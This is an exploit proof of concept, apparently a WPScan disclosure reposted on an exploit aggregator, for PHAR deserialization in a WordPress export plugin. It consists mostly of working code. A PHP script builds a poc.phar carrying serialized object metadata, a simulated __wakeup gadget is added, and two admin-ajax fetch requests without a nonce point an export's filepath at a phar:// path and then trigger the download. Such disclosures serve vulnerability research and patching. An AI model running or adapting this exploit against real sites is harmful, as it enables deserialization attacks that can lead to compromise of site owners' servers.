## https://sploitus.com/exploit?id=WPEX-ID:0A08E49D-D34E-4140-A15D-AD64444665A3
1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a `poc.phar` file using the following code, and place it in the server's document root (the `/var/www/html` directory referenced in step 4):
<?php
// Stand-in class with no properties: it exists only so setMetadata(new Evil()) below serializes
// to O:4:"Evil":0:{} inside the archive. The __wakeup() gadget that reacts to it is defined in step 3.
class Evil {}
// Builds poc.phar whose manifest metadata is a serialized Evil object. The call order matters:
// startBuffering -> add an entry -> setStub -> setMetadata -> stopBuffering, which writes the archive once.
// Creating an archive requires phar.readonly=0 in php.ini; otherwise `new Phar()` throws and only the
// message is echoed by the catch block below.
try
{
$pharFile = 'poc.phar';
// Start from a fresh archive rather than opening a stale one from a previous run.
if (file_exists($pharFile))
{
unlink($pharFile);
}
$phar = new Phar($pharFile);
$phar->startBuffering();
// Any entry works; step 4 references it as phar:///.../poc.phar/test.txt so the wrapper resolves the archive.
$phar->addFromString( 'test.txt', 'text' );
// Minimal stub; the manifest (and the metadata stored in it) is what the phar:// wrapper parses.
$phar->setStub( '<?php __HALT_COMPILER(); ?>' );
// Stored as serialize(new Evil()). On PHP <= 7.4 the phar:// stream wrapper unserializes this metadata
// when the archive is opened (PHP 8.0 stopped doing so automatically, which is why step 1 pins PHP 7.4).
$phar->setMetadata( new Evil() );
$phar->stopBuffering();
echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
echo $e->getMessage();
}
3. Add the following class to the server's PHP code, so that it is loaded, to simulate a deserialization gadget:
class Evil
{
    /**
     * Simulated gadget: unserializing any Evil instance halts the process
     * and prints a marker string, which is how step 5 makes the
     * deserialization observable.
     */
    public function __wakeup()
    {
        exit('Arbitrary deserialization');
    }
}
4. Run the following code in your browser while logged in as a Super Admin to create a new export, and note its ID. Notice that no nonce is required. Replace `/var/www/html` with the server's document root if it differs.
// Step 4: creates an export record via admin-ajax. The request carries only the session cookie
// (credentials: "include") and no nonce, which is the missing check the write-up highlights.
// The `filepath` value is presumably stored with the export and reopened by the download action
// in step 5 — that is where the phar:// wrapper in it takes effect.
await fetch("/wp-admin/admin-ajax.php?action=options&page=pmxe-admin-export", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded",
},
"method": "POST",
// NOTE(review): /var/www/html must match the document root where poc.phar was placed in step 2.
"body": "update_previous=0&filepath=phar:///var/www/html/poc.phar/test.txt&export_to=XmlGoogleMerchants",
"mode": "cors",
});
5. Run the following code in your browser, again as a Super Admin (no nonce needed), replacing `ID` with the ID of the export created in the previous step, and confirm from its output that the PHAR deserialization occurs.
// Step 5: the download action for the export created in step 4; replace `ID` in the URL with that
// export's ID. The server presumably opens the export's stored filepath (phar://...), which on
// PHP <= 7.4 unserializes the archive metadata; the Evil::__wakeup() gadget from step 3 then halts
// with its marker string, so the response body shows that deserialization happened.
// NOTE(review): the host below is the write-up's own test bench; step 4 used a relative URL instead.
await fetch("https://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin-ajax.php?action=download&page=pmxe-admin-export&google_feed=1&id=ID", {
"credentials": "include",
"headers": {},
"method": "GET",
"mode": "cors",
});